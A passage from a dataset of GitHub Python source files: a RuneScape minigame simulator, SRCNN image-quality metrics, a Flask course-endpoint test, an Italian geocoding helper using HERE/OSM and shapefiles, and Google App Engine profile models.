Wave.SPAWN_HAMMER:\r\n self.dropped_hnls.append(Hammer(self.game))\r\n if self.hnl_flags & Wave.SPAWN_NEAR_LOGS:\r\n self.dropped_hnls.append(Logs(Logs.NEAR, self.game))\r\n if self.hnl_flags & Wave.SPAWN_FAR_LOGS:\r\n self.dropped_hnls.append(Logs(Logs.FAR, self.game))\r\n\r\n self.hnl_flags = 0b000\r\n\r\n return True\r\n\r\n @property\r\n def relative_tick(self) -> int:\r\n return self.game.tick - self.start_tick\r\n\r\n def print(self, *args, **kwargs) -> None:\r\n game_print(\"Wave.print\", f\"Wave {self.number}:\", *args, **kwargs)\r\n self.game.text_payload.append(\r\n \" \".join([str(arg) for arg in (f\"WAVE {self.number}::\", *args)])\r\n )\r\n\r\n def change_call(self) -> None:\r\n self.calls = {\r\n \"a\": None, \"c\": None, \"d\": None, \"h\": None,\r\n }\r\n\r\n for key in self.correct_calls:\r\n if self.correct_calls[key] is None:\r\n if key == \"a\":\r\n call = int(random() * Attacker.CALL_COUNT)\r\n else:\r\n call = int(random() * Player.CALL_COUNT)\r\n else:\r\n if key == \"a\":\r\n call = int(random() * (Attacker.CALL_COUNT - 1))\r\n else:\r\n call = int(random() * (Player.CALL_COUNT - 1))\r\n if call >= self.correct_calls[key]:\r\n call += 1\r\n self.correct_calls[key] = call\r\n self.print(f\"Call {self.relative_tick // Inspectable.CALL} ({Terrain.tick_to_string(self.relative_tick)}).\")\r\n\r\n def end(self) -> None:\r\n self.end_flag = True\r\n self.print(f\"Wave ended ({Terrain.tick_to_string(self.relative_tick)}).\")\r\n\r\n\r\nclass Game:\r\n def __init__(self):\r\n self.inspectable: Inspectable = Inspectable(self)\r\n self.players: Optional[Players] = None\r\n self.original_ai: Dict[str, Type[Ai]] = {}\r\n self.ai: Dict[str, Union[Type[Ai], Ai]] = {}\r\n self.tick: int = -1\r\n self.wave: Optional[Wave] = None\r\n\r\n self.runner_movements: List[List[C]] = []\r\n\r\n self.block_map: List[str] = Terrain.new()\r\n\r\n def start_new_wave(self, wave_number: int, runner_movements: List[List[C]]) -> None:\r\n self.set_new_players(self.original_ai) # Keeps AI dictionary unmodified, resets players.\r\n assert 0 <= wave_number < 10, \"The wave (0-indexed) should be between 0 and 9.\"\r\n assert wave_number != 9, \"Wave 10 is not implemented yet in this project.\"\r\n self.tick = -1 # Tick 0 of wave is tick 0 of game is the tick at the first call of wave and game.\r\n self.wave = Wave(wave_number, self.tick + 1, self.inspectable) # self.wave.start_tick is 0.\r\n\r\n self.runner_movements = runner_movements\r\n\r\n self.wave.penance.set_runner_movements(runner_movements.copy())\r\n\r\n for role in self.ai:\r\n ai = self.ai[role]\r\n if isinstance(ai, Ai):\r\n ai.start_wave()\r\n\r\n def set_new_players(self, ai: Dict[str, Type[Ai]]) -> None:\r\n # Garbage collect the old locatables.\r\n self.inspectable.uuids = []\r\n self.inspectable.locatables = []\r\n self.original_ai = ai\r\n self.block_map: List[str] = Terrain.new()\r\n\r\n # Create new players.\r\n self.players: Players = Players(self.inspectable)\r\n for role in ai:\r\n self.ai[role] = ai[role](self.inspectable)\r\n\r\n # Reset wave. This method is usually called by Game.start_new_wave, which then creates a new wave too.\r\n self.wave = None\r\n\r\n def __call__(self) -> bool:\r\n assert self.wave is not None, \"Please call start_new_wave before processing the game loop.\"\r\n assert self.players is not None, \"Please call set_new_players before processing the game loop.\"\r\n\r\n # Process actions related to the the AI actions.\r\n for role in self.ai:\r\n if self.ai[role] is not None:\r\n self.ai[role].__call__()\r\n\r\n # Call this in main as: while game(): pass;\r\n # Increment tick.\r\n self.tick += 1\r\n\r\n # Process actions related to the wave, and return if the wave ended.\r\n # While it is generally understood that in the original Runescape, wave actions are not a \"separate\" process\r\n # to be run in game cycle, but rather an extension on scroller, and if we were to adhere to original Runescape\r\n # coding structure, should be part of the `if not self.players(self.tick):` part for MainAttacker, here, our\r\n # purpose is not to be consistent with the original Runescape coding decisions, which make sense for the\r\n # original Runescape coding circumstances (weak server machines, hundreds of players per server, lots of\r\n # minigames / other content, individual checking is infeasible), but instead, to implement coding structure\r\n # that is coherent, and *logically* consistent with how the original Runescape acts, yet works fine on our\r\n # circumstances (strong machines, just five players and one minigame, very fast execution required).\r\n if not self.wave():\r\n return False\r\n\r\n # Process actions related to the players, and return if a player died (currently impossible).\r\n # Player actions NEED to be done after Npc actions. The order is important! This matters for things like\r\n # manual Healer poisoning (which is a Player action) causing reserve healers to spawn a tick later than\r\n # automatic Healer poisoning (which is an Npc action).\r\n if not self.players():\r\n return False\r\n\r\n return True\r\n\r\n def render_map(self, _print: bool = False, players_only: bool = False) -> List[str]:\r\n tmp = Terrain.new()\r\n\r\n if self.players is not None:\r\n for key, player in self.players:\r\n Terrain.set_letter(player.location, F[key.upper()], tmp)\r\n\r\n # Npcs render above Players to allow for interacting with said Npc. Never does a player need to interact\r\n # with another under the current assumptions (no wave 10, no healing).\r\n if self.wave is not None and not players_only:\r\n for key, species in self.wave.penance:\r\n for npc in species:\r\n Terrain.set_letter(npc.location, F[key.lower()], tmp)\r\n\r\n if _print:\r\n Terrain.print(tmp)\r\n game_print(\"Game.render_map\", self.wave.relative_tick)\r\n\r\n return tmp\r\n\r\n def print_runners(self) -> None:\r\n game_print(\"Game.print_runners\", *(f\" {runner}\\n\" for runner in self.wave.penance.runners))\r\n","repo_name":"mmdts/pyba","sub_path":"simulation/game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":10088,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"39307661941","text":"#\r\n# @rajeevp\r\n#\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\nclass Utils(object):\r\n def __init__(self):\r\n np.random.seed(9076301)\r\n self.description = \" Utilities\"\r\n self.scale=3\r\n self.img_orig = None\r\n self.img_cubic = None\r\n self.img_srcnn = None\r\n self.img_srcnn_np = None\r\n self.pad = None\r\n\r\n def __str__(self):\r\n return self.description\r\n \r\n def ssim(self, im1, im2):\r\n mean1 = np.mean(im1)\r\n mean2 = np.mean(im2)\r\n var1 = np.var(im1)\r\n var2 = np.var(im2)\r\n covar = np.mean((im1-mean1)*(im2-mean2))\r\n c1 = np.square(0.01 * 255)\r\n c2 = np.square(0.03 * 255)\r\n num = (2 * mean1 * mean2 + c1) * (2 * covar + c2)\r\n denom = (mean1**2 + mean2**2 + c1) * (var1 + var2 + c2)\r\n val = num / denom\r\n return val\r\n\r\n\r\n def psnr(self, im1, im2):\r\n diff = (im1 - im2)**2.0\r\n val = 20*np.log10(255.0/np.sqrt(np.mean(diff)))\r\n return val\r\n \r\n def compare_images(self, img_orig, img_cubic, img_srcnn, img_srcnn_np):\r\n print(\"***** compare images *****\")\r\n im = cv2.imread(img_orig, cv2.IMREAD_COLOR)\r\n im = im[0:im.shape[0]-np.remainder(im.shape[0], self.scale),\r\n 0:im.shape[1]-np.remainder(im.shape[1], self.scale),\r\n :]\r\n self.pad = int( ( im.shape[0] - ((im.shape[0]-9+1) -5+1) ) / 2 )\r\n self.img_orig = cv2.cvtColor(im, cv2.COLOR_BGR2YCrCb)[self.pad:-self.pad, self.pad:-self.pad, 0]\r\n self.img_orig = self.img_orig.astype('float')\r\n\r\n im = cv2.imread(img_cubic, cv2.IMREAD_COLOR)\r\n self.img_cubic = cv2.cvtColor(im, cv2.COLOR_BGR2YCrCb)[self.pad:-self.pad, self.pad:-self.pad, 0]\r\n self.img_cubic = self.img_cubic.astype('float')\r\n\r\n im = cv2.imread(img_srcnn, cv2.IMREAD_COLOR)\r\n self.img_srcnn = cv2.cvtColor(im, cv2.COLOR_BGR2YCrCb)[self.pad:-self.pad, self.pad:-self.pad, 0]\r\n self.img_srcnn = self.img_srcnn.astype('float')\r\n\r\n im = cv2.imread(img_srcnn, cv2.IMREAD_COLOR)\r\n self.img_srcnn_np = cv2.cvtColor(im, cv2.COLOR_BGR2YCrCb)[self.pad:-self.pad, self.pad:-self.pad, 0]\r\n self.img_srcnn_np = self.img_srcnn_np.astype('float')\r\n\r\n # Compare PSNR\r\n p0 = self.psnr(self.img_orig, self.img_cubic)\r\n p1 = self.psnr(self.img_orig, self.img_srcnn)\r\n p2 = self.psnr(self.img_orig, self.img_srcnn_np)\r\n d0 = 100.0*(p1-p0)/p0\r\n d1 = 100.0*(p2-p0)/p0\r\n print(img_orig.split(\"/\")[-1], \"Dimensions:\", self.img_orig.shape)\r\n print(\"PSNR cubic: %f srcnn : %f Improvement: %f percent\"%(p0, p1, d0))\r\n print(\"PSNR cubic: %f srcnn_np: %f Improvement: %f percent\"%(p0, p2, d1))\r\n\r\n # Compare SSIM\r\n p0 = self.ssim(self.img_orig, self.img_cubic)\r\n p1 = self.ssim(self.img_orig, self.img_srcnn)\r\n p2 = self.ssim(self.img_orig, self.img_srcnn_np)\r\n print(\"SSIM cubic: %f srcnn : %f delta: %f\"%(p0, p1, p1-p0))\r\n print(\"SSIM cubic: %f srcnn_np: %f delta: %f\"%(p0, p2, p2-p0))\r\n\r\n # Compare MSE\r\n p0 = np.mean(np.square(self.img_orig - self.img_cubic))\r\n p1 = np.mean(np.square(self.img_orig - self.img_srcnn))\r\n p2 = np.mean(np.square(self.img_orig - self.img_srcnn_np))\r\n d0 = 100.0*(p1-p0)/p0\r\n d1 = 100.0*(p2-p0)/p0\r\n print(\"MSE cubic: %f srcnn : %f Delta: %f percent\"%(p0, p1, d0))\r\n print(\"MSE cubic: %f srcnn_np: %f Delta: %f percent\"%(p0, p2, d1))\r\n\r\n\r\n \r\nif __name__ == \"__main__\":\r\n obj = Utils()\r\n obj.compare_images( img_orig=\"../dataset/Test/Set5/butterfly_GT.bmp\", \r\n img_cubic=\"./data/butterfly_GT_cubic.jpg\",\r\n img_srcnn=\"./data/butterfly_GT_srcnn.jpg\",\r\n img_srcnn_np=\"./data/butterfly_GT_srcnn_np.jpg\")\r\n obj.compare_images( img_orig=\"../dataset/Test/Set14/monarch.bmp\", \r\n img_cubic=\"./data/monarch_cubic.jpg\",\r\n img_srcnn=\"./data/monarch_srcnn.jpg\",\r\n img_srcnn_np=\"./data/monarch_srcnn_np.jpg\")\r\n obj.compare_images( img_orig=\"../dataset/Test/Set14/everest.jpg\", \r\n img_cubic=\"./data/everest_cubic.jpg\",\r\n img_srcnn=\"./data/everest_srcnn.jpg\",\r\n img_srcnn_np=\"./data/everest_srcnn_np.jpg\")\r\n ","repo_name":"rajeevpatwari/srcnn","sub_path":"pysrc/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23248472299","text":"import contextlib\nimport json\n\nfrom server.blueprints.pre_enrolment.services.pre_enrolment_service import (\n PreEnrolmentService,\n)\nfrom unittest.mock import Mock\nimport unittest\n\nfrom server_tests.database_test_utils import WithApp\nfrom server_tests.mothers.course_mother import CourseMother\n\nPRE_ENROLMENT_URL = \"/pre-enrolment/v1/courses\"\n\n\nclass TestPreEnrolmentPost(WithApp):\n def setUp(self):\n super().setUp()\n\n self.courses = [\n CourseMother.published(id_=\"1\"),\n CourseMother.published(id_=\"2\"),\n CourseMother.published(id_=\"3\"),\n ]\n\n self.pre_enrolment_service_mock = Mock(spec=PreEnrolmentService)\n self.pre_enrolment_service_mock.get_published_courses.return_value = (\n self.courses\n )\n\n @contextlib.contextmanager\n def override_pre_enrolment_service(self):\n \"\"\"shortcut for overriding the pre enrolment service with the mock\"\"\"\n with self.app.container.pre_enrolment_service.override(\n self.pre_enrolment_service_mock\n ) as ctx:\n yield ctx\n\n def test_returns_empty_list_if_no_courses(self):\n # Arrange\n self.pre_enrolment_service_mock.get_published_courses.return_value = []\n expected_result = []\n\n # Act\n with self.override_pre_enrolment_service():\n r = self.client.get(PRE_ENROLMENT_URL, json=None)\n\n # Assert\n self.assertEqual(r.status_code, 200)\n self.assertEqual(json.loads(r.get_data(as_text=True)), expected_result)\n\n def test_returns_courses(self):\n # Arrange\n expected_count = len(self.courses)\n expected_ids = [c.id for c in self.courses]\n\n # Act\n with self.override_pre_enrolment_service():\n r = self.client.get(PRE_ENROLMENT_URL, json=None)\n\n # Assert\n self.assertEqual(r.status_code, 200)\n self.assertEqual(len(json.loads(r.get_data(as_text=True))), expected_count)\n self.assertEqual(\n [c[\"id\"] for c in json.loads(r.get_data(as_text=True))], expected_ids\n )\n\n def test_not_returns_private_fields(self):\n # Arrange\n # Act\n with self.override_pre_enrolment_service():\n r = self.client.get(PRE_ENROLMENT_URL, json=None)\n\n # Assert\n for course in json.loads(r.get_data(as_text=True)):\n self.assertNotIn(\"price_term\", course)\n self.assertNotIn(\"is_published\", course)\n self.assertNotIn(\"rooms\", course)\n self.assertNotIn(\"teachers\", course)\n self.assertNotIn(\"students\", course)\n self.assertNotIn(\"schedules\", course)\n self.assertNotIn(\"calendar_id\", course)\n self.assertNotIn(\"attendances\", course)\n self.assertNotIn(\"calendar_url\", course)\n\n def test_only_public_fields_are_returned(self):\n # Arrange\n expected_attributes_count = 5\n\n # Act\n with self.override_pre_enrolment_service():\n r = self.client.get(PRE_ENROLMENT_URL, json=None)\n\n # Assert\n for course in json.loads(r.get_data(as_text=True)):\n self.assertEqual(expected_attributes_count, len(course))\n self.assertIn(\"base_schedules\", course)\n self.assertIn(\"description\", course)\n self.assertIn(\"id\", course)\n self.assertIn(\"labels\", course)\n self.assertIn(\"name\", course)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"miquelvir/centrifuga4","sub_path":"server_tests/unit_tests/blueprints_tests/pre_enrolment_tests/resources_tests/courses_test.py","file_name":"courses_test.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"778695099","text":"import requests\r\nimport re\r\nimport json\r\nimport here_wrapper as here\r\nimport osm_wrapper as osm\r\nimport mysql.connector as mariadb\r\nimport geopandas as gpd\r\n\r\nfrom shapely.geometry import Point\r\nfrom common import get_null_obj, conf, get_geocode_df\r\n\r\nfp = 'shapefile/Com01012020_g/Com01012020_g_WGS84.shp'\r\nshp = gpd.read_file(fp)\r\nshp = shp.to_crs(\"EPSG:4326\")\r\n\r\ncodici_istati_df = get_geocode_df()\r\n\r\ndef get_latlon(par, limit_result=None):\r\n '''\r\n 1. provo a arricchire attraverso here. Se content vuoto allora OSM\r\n '''\r\n\r\n get_string , content = here.geocode(par)\r\n geocode_service = \"HERE\"\r\n if content == []:\r\n\r\n get_string, content = osm.geocode(par)\r\n geocode_service = \"OSM\"\r\n\r\n if content == []:\r\n get_string = {'here': here.compose_request(conf, par), 'osm': osm.compose_request(par)}\r\n geocode_service = \"\"\r\n content = [get_null_obj()]\r\n limit_result = 1\r\n\r\n return {'req':get_string, \r\n 'resp':content[:limit_result],\r\n 'geocode_service':geocode_service\r\n }\r\n\r\n\r\ndef reverse_geocode(lat, lng):\r\n \r\n pt = Point(lng, lat)\r\n\r\n record = None\r\n \r\n for ix, row in shp.iterrows():\r\n if row[\"geometry\"].contains(pt):\r\n pro_com = row[\"PRO_COM\"]\r\n \r\n record = codici_istati_df.query('codice_istat_comune == {}'.format(pro_com))\r\n \r\n record = record.iloc[0,:]\r\n\r\n \r\n if record is not None:\r\n response = {\r\n 'request':{\r\n 'latitudine':lat,\r\n 'longitudine':lng\r\n }, \r\n 'response':{\r\n 'id_regione':int(record[0]), \r\n 'regione':record[1], \r\n 'id_provincia':int(record[2]), \r\n 'provincia':record[3], \r\n 'sigla':record[4], \r\n 'id_comune':str(record[5]), \r\n 'comune':record[6], \r\n 'centroide':{\r\n 'latitudine': record[8], \r\n 'longitudine': record[7]\r\n }\r\n }\r\n }\r\n else:\r\n response = [] \r\n\r\n return response","repo_name":"mattcond/geocode","sub_path":"geocode_function.py","file_name":"geocode_function.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10264304983","text":"__authors__ = [\n '\"Daniel Hans\" ',\n '\"Todd Larsen\" ',\n '\"Sverre Rabbelier\" ',\n '\"Pawel Solyga\" ',\n]\n\n\nfrom google.appengine.ext import db\n\nfrom django.utils.translation import ugettext\n\nfrom soc.models import countries\n\nimport soc.models.linkable\nimport soc.models.school\nimport soc.models.user\n\n\nclass StudentInfo(soc.models.base.ModelWithFieldAttributes):\n \"\"\"The model which contains some detailed information which are necessary\n only when the user has a student role. \n \"\"\"\n\n school_name = db.StringProperty(required=True, \n verbose_name=ugettext('School Name'))\n school_name.group = ugettext(\"5. Education\")\n school_name.help_text = ugettext(\n 'Please enter the full name of your school, college or university in'\n ' this field. Please use the complete formal name of your school, e.g.'\n ' UC Berkeley instead of Cal or UCB. It would be most wonderful if you'\n ' could provide your school\\'s name in English, as all the program '\n 'administrators speak English as their first language and it will make'\n ' it much easier for us to assemble program statistics, etc., later if'\n ' we can easily read the name of your school.')\n\n school_country = db.StringProperty(required=True,\n verbose_name=ugettext('School Country/Territory'),\n choices=countries.COUNTRIES_AND_TERRITORIES)\n school_country.group = ugettext(\"5. Education\")\n\n #: School home page URL, not required here but enforced in the form for\n #: backwards compatibility.\n school_home_page = db.LinkProperty(\n required=False, verbose_name=ugettext(\"School Home Page URL\"))\n school_home_page.group = ugettext(\"5. Education\")\n\n #: School type can be only High school for GCI and can be University\n #: for GSoC.\n school_type = db.StringProperty(required=False,\n verbose_name=ugettext('School Type'),\n choices=['University', 'High School'])\n school_type.group = ugettext(\"5. Education\")\n\n major = db.StringProperty(required=False,\n verbose_name=ugettext('Major Subject'))\n major.group = ugettext(\"5. Education\")\n\n degree = db.StringProperty(required=False,\n verbose_name=ugettext('Degree'),\n choices=['Undergraduate', 'Master', 'PhD'])\n degree.group = ugettext(\"5. Education\")\n\n expected_graduation = db.IntegerProperty(required=True,\n verbose_name=ugettext('Expected Graduation Year'))\n expected_graduation.help_text = ugettext(\"Pick your expected graduation year\")\n expected_graduation.group = ugettext(\"5. Education\")\n\n #: A many:1 relationship that ties multiple Students to the\n #: School that they attend.\n school = db.ReferenceProperty(reference_class=soc.models.school.School,\n required=False, collection_name='students')\n\n\nclass Role(soc.models.linkable.Linkable):\n \"\"\"Information common to Program participation for all Roles.\n\n Some details of a Role are considered \"public\" information, and nearly\n all of these are optional (except for given_name, surname, and email).\n Other details of a Role are kept \"private\" and are only provided to\n other Users in roles that \"need to know\" this information. How these\n fields are revealed is usually covered by Program terms of service.\n\n Role is the entity that is created when a User actually participates\n in some fashion in a Program. Role details could *possibly* be collected\n without actual participation (voluntary, opt-in, of course).\n\n A Role is a User's participation in a single Program. To avoid\n duplication of data entry, facilities will be available for selecting\n an existing Role associated with a particular User to be duplicated for\n participation in a new Program.\n\n A User has to have at least one Role in order to be able to create\n any Work (such as a Document) on the site. The easiest-to-obtain Role is\n probably Club Member (though Clubs can set their own membership criteria).\n\n A Role entity participates in the following relationships implemented\n as a db.ReferenceProperty elsewhere in another db.Model:\n\n documentation) a 1:many relationship of Documentation (tax forms,\n letters from schools, etc.) associated with the Role by Hosts. This\n relation is implemented as the 'documentation' back-reference Query of\n the Documentation model 'role' reference.\n\n works) a many:many relationship with Works, stored in a separate\n WorksRoles model, representing the Work authored by this Role.\n See the WorksRoles model class for details.\n \"\"\"\n\n #: A required many:1 relationship that ties (possibly multiple\n #: entities of) Role details to a unique User. A Role cannot\n #: exist unassociated from a login identity and credentials. The\n #: back-reference in the User model is a Query named 'roles'.\n user = db.ReferenceProperty(reference_class=soc.models.user.User,\n required=True, collection_name='roles')\n\n\n #====================================================================\n # (public) name information\n #====================================================================\n\n #: Required field storing the parts of the Role's name\n #: corresponding to the field names; displayed publicly.\n #: given_name can only be ASCII, not UTF-8 text, because it is\n #: used, for example, as part of the shipping (mailing) address.\n given_name = db.StringProperty(required=True,\n verbose_name=ugettext('First (given) name'))\n given_name.help_text = ugettext('only A-z, 0-9 and whitespace characters')\n given_name.group = ugettext(\"1. Public Info\")\n\n #: Required field storing the parts of the Role's name\n #: corresponding to the field names; displayed publicly.\n #: Surname can only be ASCII, not UTF-8 text, because it is\n #: used, for example, as part of the shipping (mailing) address.\n surname = db.StringProperty(\n required=True,\n verbose_name=ugettext('Last (family) name'))\n surname.help_text = ugettext('only A-z, 0-9 and whitespace characters')\n surname.group = ugettext(\"1. Public Info\")\n\n #: Optional field used as a display name, such as for awards\n #: certificates. Should be the entire name in the format\n #: the Role would like it displayed (could be surname followed by\n #: given name in some cultures, for example). Display names can be\n #: any valid UTF-8 text.\n name_on_documents = db.StringProperty(\n verbose_name=ugettext('Name on documents'))\n name_on_documents.help_text = ugettext(\n 'Optional field used as a display name, such as for documents like '\n 'awards certificates. Should be the entire name in the format '\n 'the person would like it displayed (could be family name followed '\n 'by given name in some cultures, for example). Name on documents can be '\n 'any valid UTF-8 text.')\n name_on_documents.group = ugettext(\"1. Public Info\")\n\n #====================================================================\n # (public) contact information\n #====================================================================\n\n #: Optional field storing Instant Messaging network; displayed publicly.\n im_network = db.StringProperty(\n verbose_name=ugettext('IM Network'))\n im_network.help_text = ugettext(\n 'examples: irc:irc.freenode.net xmpp:gmail.com/Home')\n im_network.group = ugettext(\"1. Public Info\")\n\n #: Optional field storing Instant Messaging handle; displayed publicly.\n im_handle = db.StringProperty(\n verbose_name=ugettext('IM Handle'))\n im_handle.help_text = ugettext(\n 'personal identifier, such as: screen name, IRC nick, user name')\n im_handle.group = ugettext(\"1. Public Info\")\n\n #: Optional field storing a home page URL; displayed publicly.\n home_page = db.LinkProperty(\n verbose_name=ugettext('Home Page URL'))\n home_page.group = ugettext(\"1. Public Info\")\n\n #: Optional field storing a blog URL; displayed publicly.\n blog = db.LinkProperty(\n verbose_name=ugettext('Blog URL'))\n blog.group = ugettext(\"1. Public Info\")\n\n #: Optional field storing a URL to an image, expected to be a\n #: personal photo (or cartoon avatar, perhaps); displayed publicly.\n photo_url = db.LinkProperty(\n verbose_name=ugettext('Thumbnail Photo URL'))\n photo_url.help_text = ugettext(\n 'URL of 64x64 pixel thumbnail image')\n photo_url.group = ugettext(\"1. Public Info\")\n\n #====================================================================\n # (private) contact information\n #====================================================================\n\n #: Optional field storing the latitude provided by the Role; displayed\n #: publicly.\n latitude = db.FloatProperty(\n verbose_name=ugettext('Latitude'))\n latitude.help_text = ugettext(\n 'decimal degrees northerly (N), use minus sign (-) for southerly (S)')\n latitude.group = ugettext(\"2. Location Info\")\n\n #: Optional field storing the longitude provided by the Role; displayed\n #: publicly.\n longitude = db.FloatProperty(\n verbose_name=ugettext('Longitude'))\n longitude.help_text = ugettext(\n 'decimal degrees easterly (E), use minus sign (-) for westerly (W)')\n longitude.group = ugettext(\"2. Location Info\")\n\n #: field storing whether the User has agreed to publish his location\n publish_location = db.BooleanProperty(required=False, default=False,\n verbose_name=ugettext('Publish my location'))\n publish_location.help_text = ugettext(\n 'By checking this box, you are agreeing to allow your location to be'\n ' displayed, as given by the Marker below, on any map.'\n ' For instance on the map linking Students to Mentors or'\n ' by showing your location on your public profile page in the system.')\n publish_location.example_text = ugettext('You can set your location below')\n publish_location.group = ugettext(\"2. Location Info\")\n\n #: Required field used as the contact mechanism for the program\n #: Role (for example the address the system sends emails to).\n email = db.EmailProperty(\n required=True,\n verbose_name=ugettext('Email Address'))\n email.group = ugettext(\"2. Contact Info (Private)\")\n\n #: Required field containing residence street address; kept private.\n #: Residence street address can only be ASCII, not UTF-8 text, because\n #: it may be used as a shipping address.\n res_street = db.StringProperty(required=True,\n verbose_name=ugettext('Street Address 1'))\n res_street.help_text = ugettext(\n 'street number and name, '\n 'only A-z, 0-9 and whitespace characters')\n res_street.group = ugettext(\"2. Contact Info (Private)\")\n\n #: Optional field containing the 2nd line for the residence street address;\n #: kept private.\n #: Can only be ASCII, not UTF-8 text, because\n #: it may be used as a shipping address.\n res_street_extra = db.StringProperty(required=False,\n verbose_name=ugettext('Street Address 2'))\n res_street_extra.help_text = ugettext(\n '2nd address line usually for apartment numbers. '\n 'only A-z, 0-9 and whitespace characters')\n res_street_extra.group = ugettext(\"2. Contact Info (Private)\")\n\n #: Required field containing residence address city; kept private.\n #: Residence city can only be ASCII, not UTF-8 text, because it\n #: may be used as a shipping address.\n res_city = db.StringProperty(required=True,\n verbose_name=ugettext('City'))\n res_city.help_text = ugettext(\n 'only A-z, 0-9 and whitespace characters')\n res_city.group = ugettext(\"2. Contact Info (Private)\")\n\n #: Optional field containing residence address state or province; kept\n #: private. Residence state/province can only be ASCII, not UTF-8\n #: text, because it may be used as a shipping address.\n res_state = db.StringProperty(\n verbose_name=ugettext('State/Province'))\n res_state.help_text = ugettext(\n 'optional if country/territory does not have states or provinces, '\n 'only A-z, 0-9 and whitespace characters')\n res_state.group = ugettext(\"2. Contact Info (Private)\")\n\n #: Required field containing residence address country or territory; kept\n #: private.\n res_country = db.StringProperty(required=True,\n verbose_name=ugettext('Country/Territory'),\n choices=countries.COUNTRIES_AND_TERRITORIES)\n res_country.group = ugettext(\"2. Contact Info (Private)\")\n\n #: Required field containing residence address postal code (ZIP code in\n #: the United States); kept private. Residence postal code can only be\n #: ASCII, not UTF-8 text, because it may be used as a shipping address.\n res_postalcode = db.StringProperty(required=True,\n verbose_name=ugettext('ZIP/Postal Code'))\n res_postalcode.help_text = ugettext(\n 'only A-z, 0-9 and whitespace characters')\n res_postalcode.group = ugettext(\"2. Contact Info (Private)\")\n\n #: Required field containing a phone number that will be used to\n #: contact the user, also supplied to shippers; kept private.\n phone = db.PhoneNumberProperty(\n required=True,\n verbose_name=ugettext('Phone Number'))\n phone.help_text = ugettext(\n 'include complete international calling number with country code, '\n 'use numbers only')\n phone.example_text = ugettext(\n \"e.g. 1650253000 for Google's Corp HQ number in the United States\")\n phone.group = ugettext(\"2. Contact Info (Private)\")\n\n #: Optional field containing a separate recipient name; kept\n #: private. Recipient name can only be ASCII, not UTF-8 text\n ship_name = db.StringProperty(\n verbose_name=ugettext('Full Recipient Name'))\n ship_name.example_text = ugettext(\n 'Make sure to complete all fields if differs from contact address')\n ship_name.help_text = ugettext(\n 'Fill in the name of the person who should be receiving your packages. '\n 'Fill in only if you want your shipping address to differ from your '\n 'contact address.')\n ship_name.group = ugettext(\"3. Shipping Info (Private and Optional)\")\n\n #: Optional field containing a separate shipping street address; kept\n #: private. If shipping address is not present in its entirety, the\n #: residence address will be used instead. Shipping street address can only\n #: be ASCII, not UTF-8 text, because, if supplied, it is used as a\n #: shipping address.\n ship_street = db.StringProperty(\n verbose_name=ugettext('Shipping Street Address 1'))\n ship_street.help_text = ugettext(\n 'street number and name, '\n 'only A-z, 0-9 and whitespace characters. '\n 'Fill in only if you want your shipping address to differ from your '\n 'contact address.')\n ship_street.group = ugettext(\"3. Shipping Info (Private and Optional)\")\n\n #: Optional field containing a 2nd line for the shipping street address; kept\n #: private. If shipping address is not present in its entirety, the\n #: residence address will be used instead. Shipping street address can only\n #: be ASCII, not UTF-8 text, because, if supplied, it is used as a\n #: shipping address.\n ship_street_extra = db.StringProperty(\n verbose_name=ugettext('Shipping Street Address 2'))\n ship_street_extra.help_text = ugettext(\n '2nd address line usually used for apartment numbers, '\n 'only A-z, 0-9 and whitespace characters. '\n 'Fill in only if you want your shipping address to differ from your '\n 'contact address.')\n ship_street_extra.group = ugettext(\"3. Shipping Info (Private and Optional)\")\n\n #: Optional field containing shipping address city; kept private.\n #: Shipping city can only be ASCII, not UTF-8 text, because, if\n #: supplied, it is used as a shipping address.\n ship_city = db.StringProperty(\n verbose_name=ugettext('Shipping City'))\n ship_city.help_text = ugettext(\n 'Only A-z, 0-9 and whitespace characters. '\n 'Fill in only if you want your shipping address to differ from your '\n 'contact address.')\n ship_city.group = ugettext(\"3. Shipping Info (Private and Optional)\")\n\n #: Optional field containing shipping address state or province; kept\n #: private. Shipping state/province can only be ASCII, not UTF-8\n #: text, because, if supplied, it is used as a shipping address.\n ship_state = db.StringProperty(\n verbose_name=ugettext('Shipping State/Province'))\n ship_state.help_text = ugettext(\n 'optional if country/territory does not have states or provinces, '\n 'only A-z, 0-9 and whitespace characters. '\n 'fill in only if you want your shipping address to differ from your '\n 'contact address.')\n ship_state.group = ugettext(\"3. Shipping Info (Private and Optional)\")\n\n #: Optional field containing shipping address country or territory; kept\n #: private.\n ship_country = db.StringProperty(\n verbose_name=ugettext('Shipping Country/Territory'),\n choices=countries.COUNTRIES_AND_TERRITORIES)\n ship_country.help_text = ugettext(\n 'Fill in only if you want your shipping address to differ from your '\n 'contact address.')\n ship_country.group = ugettext(\"3. Shipping Info (Private and Optional)\")\n\n #: Optional field containing shipping address postal code (ZIP code in\n #: the United States); kept private. Shipping postal code can only be\n #: ASCII, not UTF-8 text, because, if supplied, it is used as a\n #: shipping address.\n ship_postalcode = db.StringProperty(\n verbose_name=ugettext('Shipping ZIP/Postal Code'))\n ship_postalcode.help_text = ugettext(\n 'only A-z, 0-9 and whitespace characters,'\n 'fill in only if not same as above')\n ship_postalcode.group = ugettext(\"3. Shipping Info (Private and Optional)\")\n\n #====================================================================\n # (private) personal information\n #====================================================================\n\n #: Required field containing the Role's birthdate (for\n #: determining Program participation eligibility); kept private.\n birth_date = db.DateProperty(\n required=True,\n verbose_name=ugettext('Birth Date'))\n birth_date.help_text = ugettext(\n 'format YYYY-MM-DD, required for determining program eligibility')\n birth_date.group = ugettext(\"4. Private Info\")\n birth_date.example_text = ugettext(\n 'e.g. 1999-12-31 or 12/31/1999')\n\n #: Optional field indicating choice of t-shirt fit; kept private.\n tshirt_style = db.StringProperty(\n verbose_name=ugettext('T-shirt Style'),\n choices=('male', 'female'))\n tshirt_style.group = ugettext(\"4. Private Info\")\n\n #: Optional field indicating choice of t-shirt, from XXS to 